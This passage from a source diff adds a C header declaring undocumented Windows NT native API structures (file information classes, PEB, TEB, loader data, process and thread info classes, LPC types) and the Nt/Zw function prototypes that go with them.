*PFILE_FULL_DIR_INFORMATION; + + +typedef struct _FILE_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + WCHAR FileName[1]; +} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; + + +typedef struct _FILE_BASIC_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + ULONG FileAttributes; +} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; + + +typedef struct _FILE_STANDARD_INFORMATION { + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG NumberOfLinks; + BOOLEAN DeletePending; + BOOLEAN Directory; +} FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION; + + +typedef struct _FILE_INTERNAL_INFORMATION { + LARGE_INTEGER IndexNumber; +} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION; + + +typedef struct _FILE_EA_INFORMATION { + ULONG EaSize; +} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION; + + +typedef struct _FILE_ACCESS_INFORMATION { + ACCESS_MASK AccessFlags; +} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION; + + +typedef struct _FILE_NAME_INFORMATION { + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; + + +typedef struct _FILE_RENAME_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; + + +typedef struct _FILE_NAMES_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; + + +typedef struct _FILE_DISPOSITION_INFORMATION { + BOOLEAN DeleteFile; +} FILE_DISPOSITION_INFORMATION, 
*PFILE_DISPOSITION_INFORMATION; + + +typedef struct _FILE_POSITION_INFORMATION { + LARGE_INTEGER CurrentByteOffset; +} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION; + + +typedef struct _FILE_FULL_EA_INFORMATION { + ULONG NextEntryOffset; + UCHAR Flags; + UCHAR EaNameLength; + USHORT EaValueLength; + CHAR EaName[1]; +} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; + + +typedef struct _FILE_MODE_INFORMATION { + ULONG Mode; +} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; + + +typedef struct _FILE_ALIGNMENT_INFORMATION { + ULONG AlignmentRequirement; +} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; + + +typedef struct _FILE_ALL_INFORMATION { + FILE_BASIC_INFORMATION BasicInformation; + FILE_STANDARD_INFORMATION StandardInformation; + FILE_INTERNAL_INFORMATION InternalInformation; + FILE_EA_INFORMATION EaInformation; + FILE_ACCESS_INFORMATION AccessInformation; + FILE_POSITION_INFORMATION PositionInformation; + FILE_MODE_INFORMATION ModeInformation; + FILE_ALIGNMENT_INFORMATION AlignmentInformation; + FILE_NAME_INFORMATION NameInformation; +} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; + + +typedef struct _FILE_ALLOCATION_INFORMATION { + LARGE_INTEGER AllocationSize; +} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; + + +typedef struct _FILE_END_OF_FILE_INFORMATION { + LARGE_INTEGER EndOfFile; +} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; + + +typedef struct _FILE_STREAM_INFORMATION { + ULONG NextEntryOffset; + ULONG StreamNameLength; + LARGE_INTEGER StreamSize; + LARGE_INTEGER StreamAllocationSize; + WCHAR StreamName[1]; +} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; + +typedef struct _FILE_PIPE_INFORMATION { + ULONG ReadMode; + ULONG CompletionMode; +} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; + + +typedef struct _FILE_PIPE_LOCAL_INFORMATION { + ULONG NamedPipeType; + ULONG NamedPipeConfiguration; + ULONG MaximumInstances; + ULONG CurrentInstances; + ULONG InboundQuota; + ULONG 
ReadDataAvailable; + ULONG OutboundQuota; + ULONG WriteQuotaAvailable; + ULONG NamedPipeState; + ULONG NamedPipeEnd; +} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; + + +typedef struct _FILE_PIPE_REMOTE_INFORMATION { + LARGE_INTEGER CollectDataTime; + ULONG MaximumCollectionCount; +} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; + + +typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { + ULONG MaximumMessageSize; + ULONG MailslotQuota; + ULONG NextMessageSize; + ULONG MessagesAvailable; + LARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; + + +typedef struct _FILE_MAILSLOT_SET_INFORMATION { + PLARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; + + +typedef struct _FILE_COMPRESSION_INFORMATION { + LARGE_INTEGER CompressedFileSize; + USHORT CompressionFormat; + UCHAR CompressionUnitShift; + UCHAR ChunkShift; + UCHAR ClusterShift; + UCHAR Reserved[3]; +} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; + + +typedef struct _FILE_LINK_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; + + +typedef struct _FILE_OBJECTID_INFORMATION +{ + LONGLONG FileReference; + UCHAR ObjectId[16]; + union { + struct { + UCHAR BirthVolumeId[16]; + UCHAR BirthObjectId[16]; + UCHAR DomainId[16]; + } ; + UCHAR ExtendedInfo[48]; + }; +} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; + + +typedef struct _FILE_COMPLETION_INFORMATION { + HANDLE Port; + PVOID Key; +} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; + + +typedef struct _FILE_MOVE_CLUSTER_INFORMATION { + ULONG ClusterCount; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; + + +typedef struct _FILE_NETWORK_OPEN_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + 
LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG FileAttributes; +} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; + + +typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { + ULONG FileAttributes; + ULONG ReparseTag; +} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; + + +typedef struct _FILE_TRACKING_INFORMATION { + HANDLE DestinationFile; + ULONG ObjectInformationLength; + CHAR ObjectInformation[1]; +} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; + + +typedef struct _FILE_REPARSE_POINT_INFORMATION { + LONGLONG FileReference; + ULONG Tag; +} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; + + +typedef struct _FILE_QUOTA_INFORMATION { + ULONG NextEntryOffset; + ULONG SidLength; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER QuotaUsed; + LARGE_INTEGER QuotaThreshold; + LARGE_INTEGER QuotaLimit; + SID Sid; +} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; + + +typedef struct _FILE_ID_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION; + + +typedef struct _FILE_ID_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION; + + +typedef struct 
_FILE_VALID_DATA_LENGTH_INFORMATION { + LARGE_INTEGER ValidDataLength; +} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION; + +typedef struct _FILE_LINK_ENTRY_INFORMATION { + ULONG NextEntryOffset; + LONGLONG ParentFileId; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION; + +typedef struct _FILE_LINKS_INFORMATION { + ULONG BytesNeeded; + ULONG EntriesReturned; + FILE_LINK_ENTRY_INFORMATION Entry; +} FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION; + + + +typedef enum _FSINFOCLASS { + FileFsVolumeInformation = 1, + FileFsLabelInformation, // 2 + FileFsSizeInformation, // 3 + FileFsDeviceInformation, // 4 + FileFsAttributeInformation, // 5 + FileFsControlInformation, // 6 + FileFsFullSizeInformation, // 7 + FileFsObjectIdInformation, // 8 + FileFsDriverPathInformation, // 9 + FileFsMaximumInformation +} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; + + +NTSYSAPI +NTSTATUS +NTAPI +NtCreateFile( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PLARGE_INTEGER AllocationSize, + IN ULONG FileAttributes, + IN ULONG ShareAccess, + IN ULONG CreateDisposition, + IN ULONG CreateOptions, + IN PVOID EaBuffer, + IN ULONG EaLength); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCreateFile( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PLARGE_INTEGER AllocationSize, + IN ULONG FileAttributes, + IN ULONG ShareAccess, + IN ULONG CreateDisposition, + IN ULONG CreateOptions, + IN PVOID EaBuffer, + IN ULONG EaLength); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenFile( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG ShareAccess, + IN ULONG OpenOptions + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwOpenFile( + OUT PHANDLE FileHandle, + IN 
ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG ShareAccess, + IN ULONG OpenOptions + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryDirectoryFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass, + IN BOOLEAN ReturnSingleEntry, + IN PUNICODE_STRING FileName OPTIONAL, + IN BOOLEAN RestartScan + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryDirectoryFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass, + IN BOOLEAN ReturnSingleEntry, + IN PUNICODE_STRING FileName OPTIONAL, + IN BOOLEAN RestartScan + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryVolumeInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FsInformation, + IN ULONG Length, + IN FS_INFORMATION_CLASS FsInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryVolumeInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FsInformation, + IN ULONG Length, + IN FS_INFORMATION_CLASS FsInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN 
PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwSetInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryEaFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN PVOID EaList OPTIONAL, + IN ULONG EaListLength, + IN PULONG EaIndex OPTIONAL, + IN BOOLEAN RestartScan); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryEaFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN PVOID EaList OPTIONAL, + IN ULONG EaListLength, + IN PULONG EaIndex OPTIONAL, + IN BOOLEAN RestartScan); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetEaFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwSetEaFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length); + + +NTSYSAPI +NTSTATUS +NTAPI +NtReadFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwReadFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtWriteFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT 
PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwWriteFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDeleteFile( + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwDeleteFile( + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtFlushBuffersFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwFlushBuffersFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDeviceIoControlFile( + IN HANDLE FileHandle, + IN HANDLE Event, + IN PIO_APC_ROUTINE ApcRoutine, + IN PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG IoControlCode, + IN PVOID InputBuffer, + IN ULONG InputBufferLength, + IN PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwDeviceIoControlFile( + IN HANDLE FileHandle, + IN HANDLE Event, + IN PIO_APC_ROUTINE ApcRoutine, + IN PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG IoControlCode, + IN PVOID InputBuffer, + IN ULONG InputBufferLength, + IN PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtCancelIoFile( + IN HANDLE Filehandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCancelIoFile( + IN HANDLE Filehandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlDosPathNameToNtPathName_U ( + IN PWSTR DosPathName, + OUT PUNICODE_STRING NtPathName, + OUT PWSTR * NtFileNamePart OPTIONAL, + OUT PCURDIR DirectoryInfo OPTIONAL + ); + + 
+//----------------------------------------------------------------------------- +// Process functions + +#define GDI_HANDLE_BUFFER_SIZE 34 + +// +// Process Information Classes +// + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation, + ProcessQuotaLimits, + ProcessIoCounters, + ProcessVmCounters, + ProcessTimes, + ProcessBasePriority, + ProcessRaisePriority, + ProcessDebugPort, + ProcessExceptionPort, + ProcessAccessToken, + ProcessLdtInformation, + ProcessLdtSize, + ProcessDefaultHardErrorMode, + ProcessIoPortHandlers, // Note: this is kernel mode only + ProcessPooledUsageAndLimits, + ProcessWorkingSetWatch, + ProcessUserModeIOPL, + ProcessEnableAlignmentFaultFixup, + ProcessPriorityClass, + ProcessWx86Information, + ProcessHandleCount, + ProcessAffinityMask, + ProcessPriorityBoost, + ProcessDeviceMap, + ProcessSessionInformation, + ProcessForegroundInformation, + ProcessWow64Information, + ProcessImageFileName, + ProcessLUIDDeviceMapsEnabled, + ProcessBreakOnTermination, + ProcessDebugObjectHandle, + ProcessDebugFlags, + ProcessHandleTracing, + MaxProcessInfoClass // MaxProcessInfoClass should always be the last enum +} PROCESSINFOCLASS; + +// +// Thread Information Classes +// + +typedef enum _THREADINFOCLASS { + ThreadBasicInformation, // ?? + ThreadTimes, + ThreadPriority, // ?? + ThreadBasePriority, // ?? + ThreadAffinityMask, // ?? + ThreadImpersonationToken, // HANDLE + ThreadDescriptorTableEntry, // ULONG Selector + LDT_ENTRY + ThreadEnableAlignmentFaultFixup, // ?? + ThreadEventPair, // ?? + ThreadQuerySetWin32StartAddress, // ?? + ThreadZeroTlsCell, // ?? + ThreadPerformanceCount, // ?? + ThreadAmILastThread, // ?? + ThreadIdealProcessor, // ?? + ThreadPriorityBoost, // ?? + ThreadSetTlsArrayAddress, // ?? 
+ MaxThreadInfoClass +} THREADINFOCLASS; + + +typedef struct _RTL_DRIVE_LETTER_CURDIR +{ + USHORT Flags; + USHORT Length; + ULONG TimeStamp; + STRING DosPath; + +} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; + + +typedef struct _RTL_USER_PROCESS_PARAMETERS +{ + ULONG MaximumLength; // Should be set before call RtlCreateProcessParameters + ULONG Length; // Length of valid structure + ULONG Flags; // Currently only PPF_NORMALIZED (1) is known: + // - Means that structure is normalized by call RtlNormalizeProcessParameters + ULONG DebugFlags; + + PVOID ConsoleHandle; // HWND to console window associated with process (if any). + ULONG ConsoleFlags; + HANDLE StandardInput; + HANDLE StandardOutput; + HANDLE StandardError; + + CURDIR CurrentDirectory; // Specified in DOS-like symbolic link path, ex: "C:/WinNT/SYSTEM32" + UNICODE_STRING DllPath; // DOS-like paths separated by ';' where system should search for DLL files. + UNICODE_STRING ImagePathName; // Full path in DOS-like format to process'es file image. 
+ UNICODE_STRING CommandLine; // Command line + PVOID Environment; // Pointer to environment block (see RtlCreateEnvironment) + ULONG StartingX; + ULONG StartingY; + ULONG CountX; + ULONG CountY; + ULONG CountCharsX; + ULONG CountCharsY; + ULONG FillAttribute; // Fill attribute for console window + ULONG WindowFlags; + ULONG ShowWindowFlags; + UNICODE_STRING WindowTitle; + UNICODE_STRING DesktopInfo; // Name of WindowStation and Desktop objects, where process is assigned + UNICODE_STRING ShellInfo; + UNICODE_STRING RuntimeData; + RTL_DRIVE_LETTER_CURDIR CurrentDirectores[0x20]; + +} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; + +// +// Process Environment Block +// + +typedef struct _PEB_FREE_BLOCK +{ + struct _PEB_FREE_BLOCK *Next; + ULONG Size; + +} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; + + +typedef struct _PEB_LDR_DATA +{ + ULONG Length; + BOOLEAN Initialized; + HANDLE SsHandle; + LIST_ENTRY InLoadOrderModuleList; // Points to the loaded modules (main EXE usually) + LIST_ENTRY InMemoryOrderModuleList; // Points to all modules (EXE and all DLLs) + LIST_ENTRY InInitializationOrderModuleList; + PVOID EntryInProgress; + +} PEB_LDR_DATA, *PPEB_LDR_DATA; + + +typedef struct _LDR_DATA_TABLE_ENTRY +{ + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; // Base address of the module + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT TlsIndex; + LIST_ENTRY HashLinks; + PVOID SectionPointer; + ULONG CheckSum; + ULONG TimeDateStamp; + PVOID LoadedImports; + PVOID EntryPointActivationContext; + PVOID PatchInformation; + PVOID Unknown1; + PVOID Unknown2; + PVOID Unknown3; + +} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; + + +typedef struct _PEB +{ + BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the + BOOLEAN ReadImageFileExecOptions; // + BOOLEAN BeingDebugged; // + BOOLEAN 
BitField; // reserved for bitfields with system-specific flags + + HANDLE Mutant; // INITIAL_PEB structure is also updated. + + PVOID ImageBaseAddress; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + PVOID SubSystemData; + PVOID ProcessHeap; + PRTL_CRITICAL_SECTION FastPebLock; + + PSLIST_HEADER AtlThunkSListPtr; + PVOID IFEOKey; + ULONG CrossProcessFlags; + union { + PVOID KernelCallbackTable; + PVOID UserSharedInfoPtr; + }; + + DWORD SystemReserved; + DWORD AtlThunkSListPtr32; + PVOID ApiSetMap; + + PVOID TlsExpansionCounter; + PVOID TlsBitmap; + DWORD TlsBitmapBits[2]; // relates to TLS_MINIMUM_AVAILABLE + + PVOID ReadOnlySharedMemoryBase; + PVOID SharedData; + PVOID *ReadOnlyStaticServerData; + PVOID AnsiCodePageData; + PVOID OemCodePageData; + PVOID UnicodeCaseTableData; + + // + // Useful information for LdrpInitialize + + ULONG NumberOfProcessors; + ULONG NtGlobalFlag; + + // + // Passed up from MmCreatePeb from Session Manager registry key + // + + LARGE_INTEGER CriticalSectionTimeout; + PVOID HeapSegmentReserve; + PVOID HeapSegmentCommit; + PVOID HeapDeCommitTotalFreeThreshold; + PVOID HeapDeCommitFreeBlockThreshold; + + // + // Where heap manager keeps track of all heaps created for a process + // Fields initialized by MmCreatePeb. ProcessHeaps is initialized + // to point to the first free byte after the PEB and MaximumNumberOfHeaps + // is computed from the page size used to hold the PEB, less the fixed + // size of this data structure. + // + + DWORD NumberOfHeaps; + DWORD MaximumNumberOfHeaps; + PVOID *ProcessHeaps; + + // + // + PVOID GdiSharedHandleTable; + PVOID ProcessStarterHelper; + PVOID GdiDCAttributeList; + PRTL_CRITICAL_SECTION LoaderLock; + + // + // Following fields filled in by MmCreatePeb from system values and/or + // image header. 
These fields have changed since Windows NT 4.0, + // so use with caution + // + + DWORD OSMajorVersion; + DWORD OSMinorVersion; + USHORT OSBuildNumber; + USHORT OSCSDVersion; + DWORD OSPlatformId; + DWORD ImageSubsystem; + DWORD ImageSubsystemMajorVersion; + + PVOID ImageSubsystemMinorVersion; + PVOID ImageProcessAffinityMask; + PVOID GdiHandleBuffer[GDI_HANDLE_BUFFER_SIZE]; + + // [...] - more fields are there: this is just a fragment of the PEB structure +} PEB, *PPEB; + + +// +// Thread environment block +// + +typedef struct _TEB +{ + NT_TIB NtTib; + PVOID EnvironmentPointer; + CLIENT_ID ClientId; + PVOID ActiveRpcHandle; + PVOID ThreadLocalStoragePointer; + PPEB ProcessEnvironmentBlock; + ULONG LastErrorValue; + ULONG CountOfOwnedCriticalSections; + PVOID CsrClientThread; + PVOID Win32ThreadInfo; + // Incomplete + +} TEB, *PTEB; + + +typedef struct _PROCESS_BASIC_INFORMATION +{ + NTSTATUS ExitStatus; + PPEB PebBaseAddress; + ULONG_PTR AffinityMask; + KPRIORITY BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; + +} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION; + + + +#define NtCurrentProcess() ((HANDLE) -1) +#define NtCurrentThread() ((HANDLE) -2) + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenProcess ( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN PCLIENT_ID ClientId OPTIONAL + ); + +NTSYSCALLAPI + NTSTATUS + NTAPI + NtSuspendProcess( + IN HANDLE ProcessHandle + ); + +NTSYSCALLAPI + NTSTATUS + NTAPI + NtResumeProcess( + IN HANDLE ProcessHandle + ); + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenThread ( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN PCLIENT_ID ClientId OPTIONAL + ); + +NTSYSAPI + NTSTATUS + NTAPI + NtQueryInformationThread( + IN HANDLE ThreadHandle, + IN THREADINFOCLASS ThreadInformationClass, + OUT PVOID ThreadInformation, + IN ULONG ThreadInformationLength, + OUT PULONG ReturnLength OPTIONAL + ); + 
+NTSYSAPI +NTSTATUS +NTAPI +NtQueryInformationProcess( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + OUT PVOID ProcessInformation, + IN ULONG ProcessInformationLength, + OUT PULONG ReturnLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetInformationProcess ( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + IN PVOID ProcessInformation, + IN ULONG ProcessInformationLength + ); + +//------------------------------------------------------------------------------ +// LPC Functions + +#define MAX_LPC_DATA 0x130 // Maximum number of bytes that can be copied through LPC + +// LPC connection types +typedef enum _LPC_TYPE +{ + LPC_NEW_MESSAGE, // (0) A new message + LPC_REQUEST, // (1) A request message + LPC_REPLY, // (2) A reply to a request message + LPC_DATAGRAM, // (3) + LPC_LOST_REPLY, // (4) + LPC_PORT_CLOSED, // (5) Send when port is deleted + LPC_CLIENT_DIED, // (6) Messages to thread termination ports + LPC_EXCEPTION, // (7) Messages to thread exception ports + LPC_DEBUG_EVENT, // (8) Messages to thread debug port + 